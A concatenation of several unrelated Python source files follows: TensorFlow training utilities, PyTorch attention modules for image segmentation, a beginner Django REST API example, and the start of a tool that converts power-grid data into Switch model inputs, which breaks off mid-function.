x_zeroed = tf.where(mask, x, tf.zeros_like(x))
return (tf.reduce_sum(x_zeroed, axis) / tf.reduce_sum(
tf.cast(mask, tf.float32), axis))
def minimize_and_clip(optimizer, objective, var_list, clip_val=10.0):
"""Minimized `objective` using `optimizer` w.r.t. variables in
`var_list` while ensure the norm of the gradients for each
variable is clipped to `clip_val`
"""
# Accidentally passing values < 0.0 will break all gradients.
assert clip_val > 0.0, clip_val
gradients = optimizer.compute_gradients(objective, var_list=var_list)
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, clip_val), var)
return gradients
def make_tf_callable(session_or_none, dynamic_shape=False):
"""Returns a function that can be executed in either graph or eager mode.
The function must take only positional args.
If eager is enabled, this will act as just a function. Otherwise, it
will build a function that executes a session run with placeholders
internally.
Arguments:
session_or_none (tf.Session): tf.Session if in graph mode, else None.
dynamic_shape (bool): True if the placeholders should have a dynamic
batch dimension. Otherwise they will be fixed shape.
Returns:
a Python function that can be called in either mode.
"""
if tf.executing_eagerly():
assert session_or_none is None
else:
assert session_or_none is not None
def make_wrapper(fn):
if session_or_none:
placeholders = []
symbolic_out = [None]
def call(*args):
args_flat = []
for a in args:
if type(a) is list:
args_flat.extend(a)
else:
args_flat.append(a)
args = args_flat
if symbolic_out[0] is None:
with session_or_none.graph.as_default():
for i, v in enumerate(args):
if dynamic_shape:
if len(v.shape) > 0:
shape = (None, ) + v.shape[1:]
else:
shape = ()
else:
shape = v.shape
placeholders.append(
tf.placeholder(
dtype=v.dtype,
shape=shape,
name="arg_{}".format(i)))
symbolic_out[0] = fn(*placeholders)
feed_dict = dict(zip(placeholders, args))
ret = session_or_none.run(symbolic_out[0], feed_dict)
return ret
return call
else:
return fn
return make_wrapper
def scope_vars(scope, trainable_only=False):
"""
Get variables inside a scope
The scope can be specified as a string
Parameters
----------
scope: str or VariableScope
scope in which the variables reside.
trainable_only: bool
whether or not to return only the variables that were marked as
trainable.
Returns
-------
vars: [tf.Variable]
list of variables in `scope`.
"""
return tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES
if trainable_only else tf.GraphKeys.VARIABLES,
scope=scope if isinstance(scope, str) else scope.name)
|
py | b415b93de8efcd32e1cec1de6b7e7db47b88a8bc |
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
from mmcv.utils import Registry, build_from_cfg
from .custom_blocks import Mix2Pooling, int_size
from mmseg.models.builder import ATTENTION
# ---------------------------------------------------------------------------- #
# SELayer
# ---------------------------------------------------------------------------- #
@ATTENTION.register_module()
class SE(nn.Module):
def __init__(self, in_channels, reduction=4):
super(SE, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
inter_channels = in_channels // reduction
self.fc = nn.Sequential(
nn.Linear(in_channels, inter_channels, bias=False),
nn.ReLU(inplace=True),
# Mish(),
nn.Linear(inter_channels, in_channels, bias=False),
nn.Sigmoid()
)
def forward(self, x):
n, c, h, w = int_size(x)
y = self.avg_pool(x).view(n, c)
y_expand = self.fc(y).view(n, c, 1, 1)
return x * y_expand
# ---------------------------------------------------------------------------- #
# NonLocal Block
# ---------------------------------------------------------------------------- #
@ATTENTION.register_module()
class NonLocal(nn.Module):
def __init__(self, in_channels):
super(NonLocal, self).__init__()
self.inter_channel = in_channels // 2
self.conv_phi = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1,padding=0, bias=False)
self.conv_theta = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.conv_g = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.softmax = nn.Softmax(dim=1)
self.conv_mask = nn.Conv2d(in_channels=self.inter_channel, out_channels=in_channels,
kernel_size=1, stride=1, padding=0, bias=False)
def forward(self, x):
# [N, C, H , W]
b, c, h, w = int_size(x)
# [N, C/2, H * W]
x_phi = self.conv_phi(x).view(b, c, -1)
# [N, H * W, C/2]
x_theta = self.conv_theta(x).view(b, c, -1).permute(0, 2, 1).contiguous()
x_g = self.conv_g(x).view(b, c, -1).permute(0, 2, 1).contiguous()
# [N, H * W, H * W]
mul_theta_phi = torch.matmul(x_theta, x_phi)
mul_theta_phi = self.softmax(mul_theta_phi)
# [N, H * W, C/2]
mul_theta_phi_g = torch.matmul(mul_theta_phi, x_g)
# [N, C/2, H, W]
mul_theta_phi_g = mul_theta_phi_g.permute(0,2,1).contiguous().view(b,self.inter_channel, h, w)
# [N, C, H , W]
mask = self.conv_mask(mul_theta_phi_g)
out = mask + x
return out
# ---------------------------------------------------------------------------- #
# SCSE Block
# ---------------------------------------------------------------------------- #
class SpatialSE(nn.Module):
def __init__(self, channel):
super(SpatialSE, self).__init__()
self.spatial_excitation = nn.Sequential(
nn.Conv2d(in_channels=channel, out_channels=1, kernel_size=1, stride=1, padding=0),
nn.Sigmoid()
)
def forward(self,x):
spatial_weirht = self.spatial_excitation(x)
return x * spatial_weirht
class ChannelSE(nn.Module):
def __init__(self, channel, reduction=4):
super(ChannelSE, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
reduction_channel = int(channel / reduction)
self.fc = nn.Sequential(
nn.Linear(channel, reduction_channel, bias=False),
nn.ReLU(inplace=True),
nn.Linear(reduction_channel, channel, bias=False),
nn.Sigmoid()
)
def forward(self, x):
n, c = int(x.size(0)), int(x.size(1))
y = self.avg_pool(x).view(n, c)
y_expand = self.fc(y).view(n, c, 1, 1)
return x * y_expand
@ATTENTION.register_module()
class SCSE(nn.Module):
def __init__(self, in_channels, reduction=4):
super(SCSE, self).__init__()
self.spatialSE = SpatialSE(in_channels)
self.channelSE = ChannelSE(in_channels, reduction=reduction)
def forward(self,x):
return self.spatialSE(x) + self.channelSE(x)
@ATTENTION.register_module()
class SCSE2(nn.Module):
def __init__(self, in_channels, reduction=4):
super(SCSE2, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
reduction_channel = int(in_channels / reduction)
self.channel_excitation = nn.Sequential(
nn.Linear(in_channels, reduction_channel, bias=False),
nn.ReLU(inplace=True),
nn.Linear(reduction_channel, in_channels, bias=False),
nn.Sigmoid()
)
self.spatial_excitation = nn.Sequential(
nn.Conv2d(in_channels=in_channels, out_channels=1, kernel_size=1, stride=1, padding=0),
nn.Sigmoid()
)
def forward(self,x):
n, c = int(x.size(0)), int(x.size(1))
y = self.avg_pool(x).view(n, c)
channel_weirht = self.channel_excitation(y).view(n, c, 1, 1)
spatial_weirht = self.spatial_excitation(x)
x = x * channel_weirht * spatial_weirht
return x
# ---------------------------------------------------------------------------- #
# CBAM :: Convolutional Block Attention Module
# ---------------------------------------------------------------------------- #
## ---- 通道Attention ---- ##
class ChannelAttention(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttention, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.max_pool = nn.AdaptiveMaxPool2d(1)
self.sharedMLP = nn.Sequential(
nn.Conv2d(in_planes, int(in_planes / ratio), 1, bias=False), nn.ReLU(),
nn.Conv2d(int(in_planes / ratio), in_planes, 1, bias=False))
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avgout = self.sharedMLP(self.avg_pool(x))
maxout = self.sharedMLP(self.max_pool(x))
return x * self.sigmoid(avgout + maxout)
class ChannelAttentionMixPooling(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttentionMixPooling, self).__init__()
self.mix_pool = Mix2Pooling(1)
self.sharedMLP = nn.Sequential(
nn.Conv2d(in_planes, int(in_planes / ratio), 1, bias=False), nn.ReLU(),
nn.Conv2d(int(in_planes / ratio), in_planes, 1, bias=False))
self.sigmoid = nn.Sigmoid()
def forward(self, x):
mixout = self.sharedMLP(self.mix_pool(x))
return x * self.sigmoid(mixout)
## ---- 空间Attention ---- ##
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
assert kernel_size in (3, 7), "kernel size must be 3 or 7"
padding = 3 if kernel_size == 7 else 1
self.conv = nn.Conv2d(2, 1, kernel_size, padding=padding, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avgout = torch.mean(x, dim=1, keepdim=True)
maxout, _ = torch.max(x, dim=1, keepdim=True)
out = torch.cat([avgout, maxout], dim=1)
out = self.conv(out)
return x * self.sigmoid(out)
@ATTENTION.register_module()
class CBAM(nn.Module):
def __init__(self, in_channels, ratio=16, kernel_size=7):
super(CBAM, self).__init__()
self.ChannelAttention = ChannelAttention(in_channels, ratio)
self.SpatialAttention = SpatialAttention(kernel_size)
def forward(self, x):
x = self.ChannelAttention(x)
x = self.SpatialAttention(x)
return x
@ATTENTION.register_module()
class MCBAM(nn.Module):
def __init__(self, in_channels, ratio=16, kernel_size=7):
super(MCBAM, self).__init__()
self.ChannelAttention = ChannelAttentionMixPooling(in_channels, ratio)
self.SpatialAttention = SpatialAttention(kernel_size)
def forward(self, x):
x = self.ChannelAttention(x)
x = self.SpatialAttention(x)
return x
# ---------------------------------------------------------------------------- #
# EMANet :: https://github.com/XiaLiPKU/EMANet
# ---------------------------------------------------------------------------- #
class EMAU_ORG(nn.Module):
'''The Expectation-Maximization Attention Unit (EMAU).
Arguments:
c (int): The input and output channel number.
k (int): The number of the bases.
stage_num (int): The iteration number for EM.
'''
def __init__(self, channel, k, stage_num=3, norm_layer=nn.BatchNorm2d):
super(EMAU_ORG, self).__init__()
self.stage_num = stage_num
mu = torch.Tensor(1, channel, k)
mu.normal_(0, math.sqrt(2. / k)) # Init with Kaiming Norm.
mu = self._l2norm(mu, dim=1)
self.register_buffer('mu', mu)
self.momentum = 0.9
self.conv1 = nn.Conv2d(channel, channel, 1)
self.conv2 = nn.Sequential(
nn.Conv2d(channel, channel, 1, bias=False),
norm_layer(channel))
self.relu = nn.ReLU(True)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.zero_()
def _l2norm(self, inp, dim):
'''Normlize the inp tensor with l2-norm.
Returns a tensor where each sub-tensor of input along the given dim is
normalized such that the 2-norm of the sub-tensor is equal to 1.
Arguments:
inp (tensor): The input tensor.
dim (int): The dimension to slice over to get the ssub-tensors.
Returns:
(tensor) The normalized tensor.
'''
return inp / (1e-6 + inp.norm(dim=dim, keepdim=True))
def forward(self, x):
idn = x
# The first 1x1 conv
x = self.conv1(x)
# The EM Attention
b, c, h, w = int_size(x)
x = x.view(b, c, h * w) # b * c * n
mu = self.mu.repeat(b, 1, 1) # 1 * c * k ==> b * c * k
with torch.no_grad():
for i in range(self.stage_num):
x_t = x.permute(0, 2, 1).contiguous() # b * n * c
z = torch.bmm(x_t, mu) # b * n * k
z = F.softmax(z, dim=2) # b * n * k
z_ = z / (1e-6 + z.sum(dim=1, keepdim=True))
mu = torch.bmm(x, z_) # b * c * k
mu = self._l2norm(mu, dim=1)
# !!! The moving averaging operation
if self.training:
mmu = mu.mean(dim=0, keepdim=True)
self.mu *= self.momentum
self.mu += mmu * (1 - self.momentum)
z_t = z.permute(0, 2, 1) # b * k * n
x = mu.matmul(z_t) # b * c * n
x = x.view(b, c, h, w) # b * c * h * w
x = self.relu(x)
# The second 1x1 conv
x = self.conv2(x)
x = x + idn
x = self.relu(x)
return x
class EMAU1(nn.Module):
'''The Expectation-Maximization Attention Unit (EMAU).
Arguments:
c (int): The input and output channel number.
k (int): The number of the bases.
stage_num (int): The iteration number for EM.
'''
def __init__(self, channel, k, stage_num=3, norm_layer=nn.BatchNorm2d):
super(EMAU1, self).__init__()
self.stage_num = stage_num
mu = torch.Tensor(1, channel, k)
mu.normal_(0, math.sqrt(2. / k)) # Init with Kaiming Norm.
mu = self._l2norm(mu, dim=1)
self.register_buffer('mu', mu)
self.momentum = 0.9
# self.file = open('size.txt', 'w')
self.conv1 = nn.Conv2d(channel, channel, 1)
self.conv2 = nn.Sequential(
nn.Conv2d(channel, channel, 1, bias=False),
norm_layer(channel))
self.relu = nn.ReLU(True)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.zero_()
def _l2norm(self, inp, dim):
'''Normlize the inp tensor with l2-norm.
Returns a tensor where each sub-tensor of input along the given dim is
normalized such that the 2-norm of the sub-tensor is equal to 1.
Arguments:
inp (tensor): The input tensor.
dim (int): The dimension to slice over to get the ssub-tensors.
Returns:
(tensor) The normalized tensor.
'''
return inp / (1e-6 + inp.norm(dim=dim, keepdim=True))
def forward(self, x):
idn = x
# The first 1x1 conv
x = self.conv1(x)
# The EM Attention
b, c, h, w = int_size(x)
n = int(h * w)
x = x.view(b, c, n) # b * c * n
# mu = torch.cat([self.mu], 0)
mu = self.mu.clone()
with torch.no_grad():
x_t = x.permute(0, 2, 1).contiguous() # b * n * c
for i in range(self.stage_num):
# z = torch.bmm(x_t, mu) # b * n * k
# z = torch.matmul(x_t, mu) # b * n * k
z = x_t.matmul(mu) # b * n * k
# z = torch.mm(x_t.squeeze(0), mu.squeeze(0)) # b * n * k
# z = z.unsqueeze(0)
z = F.softmax(z, dim=-1) # b * n * k
z_ = z / (1e-6 + z.sum(dim=1, keepdim=True))
mu = torch.bmm(x, z_) # b * c * k
mu = self._l2norm(mu, dim=1)
# !!! The moving averaging operation
if self.training:
mmu = mu.mean(dim=0, keepdim=True)
self.mu *= self.momentum
self.mu += mmu * (1 - self.momentum)
z_t = z.permute(0, 2, 1).contiguous() # b * k * n
x = mu.matmul(z_t) # b * c * n
x = x.view(b, c, h, w) # b * c * h * w
x = self.relu(x)
# The second 1x1 conv
x = self.conv2(x)
x = x + idn
x = self.relu(x)
return x
# EMANet for TensorRT
class EMAU(nn.Module):
'''The Expectation-Maximization Attention Unit (EMAU).
Arguments:
c (int): The input and output channel number.
k (int): The number of the bases.
stage_num (int): The iteration number for EM.
'''
def __init__(self, channel, k, stage_num=3, norm_layer=nn.BatchNorm2d):
super(EMAU, self).__init__()
self.stage_num = stage_num
mu = torch.Tensor(channel, k)
mu.normal_(0, math.sqrt(2. / k)) # Init with Kaiming Norm.
mu = self._l2norm(mu, dim=0)
self.register_buffer('mu', mu)
self.momentum = 0.9
self.conv1 = nn.Conv2d(channel, channel, 1)
self.conv2 = nn.Sequential(
nn.Conv2d(channel, channel, 1, bias=False),
norm_layer(channel))
self.relu = nn.ReLU(True)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.zero_()
def _l2norm(self, inp, dim):
'''Normlize the inp tensor with l2-norm.
Returns a tensor where each sub-tensor of input along the given dim is
normalized such that the 2-norm of the sub-tensor is equal to 1.
Arguments:
inp (tensor): The input tensor.
dim (int): The dimension to slice over to get the ssub-tensors.
Returns:
(tensor) The normalized tensor.
'''
return inp / (1e-6 + inp.norm(dim=dim, keepdim=True))
def forward(self, x):
idn = x
# The first 1x1 conv
x = self.conv1(x)
# The EM Attention
b, c, h, w = int_size(x)
n = int(h * w)
x = x.view(b, c, n) # b * c * n
mu = self.mu
with torch.no_grad():
x_t = x.permute(0, 2, 1).contiguous() # b * n * c
for i in range(self.stage_num):
z = torch.matmul(x_t, mu) # b * n * k
z = F.softmax(z, dim=2) # b * n * k
z_ = z / (1e-6 + z.sum(dim=1, keepdim=True))
mu = torch.bmm(x, z_) # b * c * k
mu = self._l2norm(mu, dim=1)
# !!! The moving averaging operation
if self.training:
mmu = mu.mean(dim=0)
self.mu *= self.momentum
self.mu += mmu * (1 - self.momentum)
z_t = z.permute(0, 2, 1).contiguous() # b * k * n
x = mu.matmul(z_t) # b * c * n
x = x.view(b, c, h, w) # b * c * h * w
x = self.relu(x)
# The second 1x1 conv
x = self.conv2(x)
x = x + idn
x = self.relu(x)
return x
@ATTENTION.register_module()
class EMA(nn.Module):
'''The Expectation-Maximization Attention Unit (EMAU).
Arguments:
c (int): The input and output channel number.
k (int): The number of the bases.
stage_num (int): The iteration number for EM.
'''
def __init__(self, in_channels, k, stage_num=3, norm_layer=nn.BatchNorm2d):
super(EMA, self).__init__()
self.stage_num = stage_num
mu = torch.Tensor(in_channels, k)
mu.normal_(0, math.sqrt(2. / k)) # Init with Kaiming Norm.
mu = self._l2norm(mu, dim=0)
self.register_buffer('mu', mu)
self.momentum = 0.9
self.conv1 = nn.Conv2d(in_channels, in_channels, 1)
self.conv2 = nn.Sequential(
nn.Conv2d(in_channels, in_channels, 1, bias=False),
norm_layer(in_channels))
self.relu = nn.ReLU(True)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.zero_()
def _l2norm(self, inp, dim):
'''Normlize the inp tensor with l2-norm.
Returns a tensor where each sub-tensor of input along the given dim is
normalized such that the 2-norm of the sub-tensor is equal to 1.
Arguments:
inp (tensor): The input tensor.
dim (int): The dimension to slice over to get the ssub-tensors.
Returns:
(tensor) The normalized tensor.
'''
return inp / (1e-6 + inp.norm(dim=dim, keepdim=True))
def forward(self, x):
# The first 1x1 conv
x = self.conv1(x)
# The EM Attention
b, c, h, w = int_size(x)
n = int(h * w)
x = x.view(b, c, n) # b * c * n
mu = self.mu
with torch.no_grad():
x_t = x.permute(0, 2, 1).contiguous() # b * n * c
for i in range(self.stage_num):
z = torch.matmul(x_t, mu) # b * n * k
z = F.softmax(z, dim=2) # b * n * k
z_ = z / (1e-6 + z.sum(dim=1, keepdim=True))
mu = torch.bmm(x, z_) # b * c * k
mu = self._l2norm(mu, dim=1)
# !!! The moving averaging operation
if self.training:
mmu = mu.mean(dim=0)
self.mu *= self.momentum
self.mu += mmu * (1 - self.momentum)
z_t = z.permute(0, 2, 1).contiguous() # b * k * n
x = mu.matmul(z_t) # b * c * n
x = x.view(b, c, h, w) # b * c * h * w
x = self.relu(x)
# The second 1x1 conv
x = self.conv2(x)
return x
# ---------------------------------------------------------------------------- #
# ECA-Net: Efficient Channel Attention
# ---------------------------------------------------------------------------- #
@ATTENTION.register_module()
class ECA(nn.Module):
"""Constructs a ECA module.
Args:
channel: Number of channels of the input feature map
k_size: Adaptive selection of kernel size
"""
def __init__(self, in_channels, k_size=3):
super(ECA, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
# self.conv = nn.Conv1d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)
self.conv = nn.Conv2d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
# x: input features with shape [b, c, h, w]
b, c, h, w = int_size(x)
# feature descriptor on the global spatial information
y = self.avg_pool(x)
# Two different branches of ECA module, y shape [b, c, 1, 1]
# y = self.conv(y.squeeze(-1).transpose(-1, -2)).transpose(-1, -2).unsqueeze(-1)
# y = self.conv(y.view(b, c, 1).permute(0, 2, 1)).permute(0, 2, 1).view(b, c, 1, 1)
y = self.conv(y.permute(0, 3, 2, 1)).permute(0, 3, 2, 1)
# Multi-scale information fusion
y = self.sigmoid(y)
return x * y
@ATTENTION.register_module()
class AECA(nn.Module):
"""Constructs a Adaptive ECA module.
Args:
channel: Number of channels of the input feature map
k_size: Adaptive selection of kernel size
"""
def __init__(self, in_channels, gamma=2, b=1):
super(AECA, self).__init__()
# t = int(abs((math.log(channels, 2) + b) / gamma))
# k_size = t if t % 2 else t + 1
if in_channels == 64:
k_size = 3
elif in_channels == 128:
k_size = 5
elif in_channels in [256, 512]:
k_size = 7
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.conv = nn.Conv1d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)
# self.conv = nn.Conv2d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
# x: input features with shape [b, c, h, w]
b, c, h, w = int_size(x)
# feature descriptor on the global spatial information
y = self.avg_pool(x)
# Two different branches of ECA module, y shape [b, c, 1, 1]
# y = self.conv(y.squeeze(-1).transpose(-1, -2)).transpose(-1, -2).unsqueeze(-1)
# y = self.conv(y.permute(0, 3, 2, 1)).permute(0, 3, 2, 1)
y = self.conv(y.view(b, c, 1).permute(0, 2, 1)).permute(0, 2, 1).view(b, c, 1, 1)
# Multi-scale information fusion
y = self.sigmoid(y)
return x * y
# ---------------------------------------------------------------------------- #
# Rotate to Attend: Convolutional Triplet Attention Module
# TripletAttention :: https://github.com/LandskapeAI/triplet-attention
# ---------------------------------------------------------------------------- #
class BasicConv(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1,
groups=1, relu=True, bn=True, bias=False):
super(BasicConv, self).__init__()
self.out_channels = out_planes
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=bias)
self.bn = nn.BatchNorm2d(out_planes,eps=1e-5, momentum=0.01, affine=True) if bn else None
self.relu = nn.ReLU(inplace=True) if relu else None
def forward(self, x):
x = self.conv(x)
if self.bn is not None:
x = self.bn(x)
if self.relu is not None:
x = self.relu(x)
return x
class ChannelPool(nn.Module):
def forward(self, x):
return torch.cat((torch.max(x,1)[0].unsqueeze(1), torch.mean(x,1).unsqueeze(1)), dim=1)
class SpatialGate(nn.Module):
def __init__(self, kernel_size = 3):
super(SpatialGate, self).__init__()
self.compress = ChannelPool()
self.conv = BasicConv(2, 1, kernel_size, stride=1, padding=(kernel_size-1) // 2, relu=False)
def forward(self, x):
x_compress = self.compress(x)
x_out = self.conv(x_compress)
scale = torch.sigmoid_(x_out)
return x * scale
@ATTENTION.register_module()
class TPA(nn.Module):
def __init__(self, in_channels, reduction_ratio=16, kernel_size=3, no_spatial=False):
super(TPA, self).__init__()
self.cw = SpatialGate()
self.hc = SpatialGate()
self.no_spatial=no_spatial
if not no_spatial:
self.hw = SpatialGate()
def forward(self, x):
x_perm1 = x.permute(0,2,1,3).contiguous()
x_out1 = self.cw(x_perm1)
x_out11 = x_out1.permute(0,2,1,3).contiguous()
x_perm2 = x.permute(0,3,2,1).contiguous()
x_out2 = self.hc(x_perm2)
x_out21 = x_out2.permute(0,3,2,1).contiguous()
if not self.no_spatial:
x_out = self.hw(x)
x_out = (1/3)*(x_out + x_out11 + x_out21)
else:
x_out = (1/2)*(x_out11 + x_out21)
return x_out |
py | b415b9eccf2e90437b15283c1a81d47c9ec1c517 | from django.shortcuts import render
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from profiles_api import serializers
class HelloApiView(APIView):
"""Test API View"""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Return a list of APIView features"""
an_apiview = [
'Uses HTTP methods as function (get, post, put, delete)',
'Is similar to a traditional Django View',
'Gives youo the most control over your application logic',
'Is mapped manually to URL',
]
return Response({'message': "Hello!", 'an_apiview': an_apiview})
def post(self, request):
"""Create a hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST,
)
def put(self, request, pk=None):
"""Handle updating an object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""Handle a partial update on an object"""
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
"""Delet an object"""
return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
"""Test API ViewSet"""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return a hello message"""
a_viewset = [
'Uses actions (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using Routers',
'Provides more functionality with less code',
]
return Response({'message': 'Hello API ViewSet', 'a_viewset': a_viewset})
def create(self, request):
"""Create a new hello massege"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello bello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
"""Handle updating an object"""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handle updating a part of an object"""
return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handle removing an object"""
return Response({'http_method': 'DELETE'})
|
py | b415babf52936b57bd92968b90621c1c3d9b7fbe | import os
import pandas as pd
from haversine import haversine
from switchwrapper import const
from switchwrapper.helpers import make_branch_indices, make_plant_indices
def grid_to_switch(grid, output_folder, storage_candidate_buses=None):
"""Convert relevant data from a Grid object and command-line-prompted user inputs
to CSVs for use with Switch.
:param powersimdata.input.grid.Grid grid: grid instance.
:param str output_folder: the location to save outputs, created as necessary.
:param set storage_candidate_buses: buses at which to enable storage expansion.
"""
# First, prompt the user for information not contained in const or the passed grid
base_year = get_base_year()
inv_period, period_start, period_end = get_inv_periods()
# Then, calculate information which feeds multiple data frames
cost_at_min_power, single_segment_slope = linearize_gencost(grid)
average_fuel_cost = calculate_average_fuel_cost(grid.plant)
# Finally, generate and save data frames to CSVs
financials_filepath = os.path.join(output_folder, "financials.csv")
build_financials(base_year).to_csv(financials_filepath, index=False)
fuels_filepath = os.path.join(output_folder, "fuels.csv")
build_fuels().to_csv(fuels_filepath, index=False)
fuel_cost_filepath = os.path.join(output_folder, "fuel_cost.csv")
fuel_cost = build_fuel_cost(average_fuel_cost, base_year, inv_period)
fuel_cost.to_csv(fuel_cost_filepath, index=False)
generation_projects_info_filepath = os.path.join(
output_folder, "generation_projects_info.csv"
)
generation_project_info = build_generation_projects_info(
grid.plant, single_segment_slope, average_fuel_cost, storage_candidate_buses
)
generation_project_info.to_csv(generation_projects_info_filepath, index=False)
gen_build_costs_filepath = os.path.join(output_folder, "gen_build_costs.csv")
gen_build_costs = build_gen_build_costs(
grid.plant, cost_at_min_power, inv_period, storage_candidate_buses
)
gen_build_costs.to_csv(gen_build_costs_filepath, index=False)
gen_build_predetermined_filepath = os.path.join(
output_folder, "gen_build_predetermined.csv"
)
build_gen_build_predetermined(grid.plant).to_csv(
gen_build_predetermined_filepath, index=False
)
load_zones_filepath = os.path.join(output_folder, "load_zones.csv")
build_load_zones(grid.bus).to_csv(load_zones_filepath, index=False)
non_fuel_energy_source_filepath = os.path.join(
output_folder, "non_fuel_energy_sources.csv"
)
build_non_fuel_energy_source().to_csv(non_fuel_energy_source_filepath, index=False)
periods_filepath = os.path.join(output_folder, "periods.csv")
build_periods(inv_period, period_start, period_end).to_csv(
periods_filepath, index=False
)
transmission_lines_filepath = os.path.join(output_folder, "transmission_lines.csv")
build_transmission_lines(grid).to_csv(transmission_lines_filepath, index=False)
trans_params_filepath = os.path.join(output_folder, "trans_params.csv")
build_trans_params().to_csv(trans_params_filepath, index=False)
def get_base_year():
"""Prompt the user for a base year.
:return: (*int*) -- base year.
"""
year = input("Please enter base study year (normally PowerSimData scenario year): ")
return int(year)
def get_inv_periods():
"""Prompt the user for investment stage, investment period, start year of each
period, end year of each period.
:return: (*tuple*) -- 3-tuple of lists, investment periods, start years, end years
"""
while True:
num_inv_stages = input("Please enter the number of investment stages: ")
if not num_inv_stages.isdigit():
print("number of investment stages must be an integer, please re-enter.")
else:
num_inv_stages = int(num_inv_stages)
break
if num_inv_stages == 1:
print("Single stage expansion identified.")
else:
print("Multi stage expansion identified.")
while True:
inv_period = input(
"Please enter investment period year, separate by space: "
).split()
if len(inv_period) == num_inv_stages:
try:
inv_period = [int(i) for i in inv_period]
break
except ValueError:
print("All investment period years must be integers, please re-enter.")
continue
print(
"investment period must match the number of investment stages, "
"please re-enter."
)
while True:
period_start = input(
"Please enter start year for each period, separate by space: "
).split()
if len(period_start) == num_inv_stages:
try:
period_start = [int(p) for p in period_start]
break
except ValueError:
print("All start years must be integers, please re-enter.")
continue
print(
"start year for each period must match the number of investment stages, "
"please re-enter."
)
while True:
period_end = input(
"Please enter end year for each period, separate by space: "
).split()
if len(period_end) == num_inv_stages:
try:
period_end = [int(p) for p in period_end]
break
except ValueError:
print("All end years must be integers, please re-enter.")
continue
print(
"end year for each period must match the number of investment stages, "
"please re-enter."
)
return inv_period, period_start, period_end
def calculate_average_fuel_cost(plant):
"""Calculate average fuel cost, by bus_id for buses containing generators.
:param pandas.DataFrame plant: plant data from a Grid object.
:return: (*pandas.DataFrame*) -- data frame of average fuel cost by bus_id.
"""
plant_mod = plant.copy()
# Map our generator types to Switch fuel types
plant_mod["fuel"] = plant_mod["type"].map(const.fuel_mapping)
# Calculate the average fuel cost for each (bus_id, fuel)
relevant_fuel_columns = ["bus_id", "fuel", "GenFuelCost"]
fuel_cost = plant_mod[relevant_fuel_columns].groupby(["bus_id", "fuel"]).mean()
return fuel_cost
def linearize_gencost(grid):
"""Calculate linearized cost parameters, incorporating assumed minimum generation.
:param powersimdata.input.grid.Grid grid: grid instance.
:return: (*tuple*) -- two pandas Series objects, indexed by plant ID within ``grid``:
first is the cost of running each generator at minimum generation.
second is the single-segment linearized slope of each generator's cost curve.
"""
plant_mod = grid.plant.copy()
plant_mod.Pmin = plant_mod.apply(
